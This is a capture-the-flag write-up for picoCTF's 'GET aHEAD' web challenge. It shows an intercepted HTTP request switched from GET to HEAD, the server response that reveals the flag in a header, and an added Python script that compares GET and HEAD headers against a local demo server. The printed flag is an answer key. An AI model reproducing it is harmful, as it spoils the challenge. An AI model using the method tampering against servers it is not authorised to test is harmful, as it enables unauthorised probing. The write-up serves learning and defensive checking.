GET aHEAD
Description:
Find the flag being held on this server to get ahead of the competition http://mercury.picoctf.net:47967/
Solution
The challenge name, ‘GET aHEAD’, hints at the HTTP HEAD method. Use Burp Suite to intercept the request; the page sends a GET request, which we change to HEAD:
HEAD /index.php HTTP/1.1
Host: mercury.picoctf.net:47967
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: close
Changing the method to HEAD returns the following response:
HTTP/1.1 200 OK
flag: picoCTF{r3j3ct_th3_du4l1ty_cca66bd3}
Content-type: text/html; charset=UTF-8
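The flag travels in a response header that only the HEAD handler emits, although HEAD is meant to return the same headers a GET would (RFC 9110). The following is an added example, not part of the original writeup: a consistency check a developer can run against their own application, comparing GET and HEAD headers for one path and reporting mismatches. DemoHandler, the X-Internal-Note header and its value are constructed for the demo.

```python
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

VOLATILE = {"date"}  # headers expected to differ between any two requests

class DemoHandler(BaseHTTPRequestHandler):
    """Constructed stand-in for an app whose HEAD handler diverges from GET."""
    def _start(self):
        self.send_response(200)
        self.send_header("Content-Type", "text/html; charset=UTF-8")

    def do_GET(self):
        self._start()
        self.end_headers()
        self.wfile.write(b"<html>index</html>")

    def do_HEAD(self):
        self._start()
        self.send_header("X-Internal-Note", "constructed-sample-value")  # HEAD-only
        self.end_headers()

    def log_message(self, *args):  # silence per-request logging
        pass

def fetch_headers(host, port, method, path):
    conn = http.client.HTTPConnection(host, port, timeout=5)
    conn.request(method, path)
    resp = conn.getresponse()
    resp.read()  # drain the body (empty for HEAD) before closing
    conn.close()
    return resp.status, {k.lower(): v for k, v in resp.getheaders()}

def head_get_divergence(host, port, path="/"):
    """Return (statuses_match, {header: (get_value, head_value)}) for mismatches."""
    get_status, get_h = fetch_headers(host, port, "GET", path)
    head_status, head_h = fetch_headers(host, port, "HEAD", path)
    names = (set(get_h) | set(head_h)) - VOLATILE
    diff = {n: (get_h.get(n), head_h.get(n)) for n in names if get_h.get(n) != head_h.get(n)}
    return get_status == head_status, diff

def run_demo():
    server = HTTPServer(("127.0.0.1", 0), DemoHandler)  # port 0 = any free port
    threading.Thread(target=server.serve_forever, daemon=True).start()
    try:
        return head_get_divergence("127.0.0.1", server.server_port, "/index.php")
    finally:
        server.shutdown()
        server.server_close()

if __name__ == "__main__":
    print(run_demo())
```

A non-empty mismatch dictionary means the two methods are handled by different code paths, which is worth reviewing before deployment.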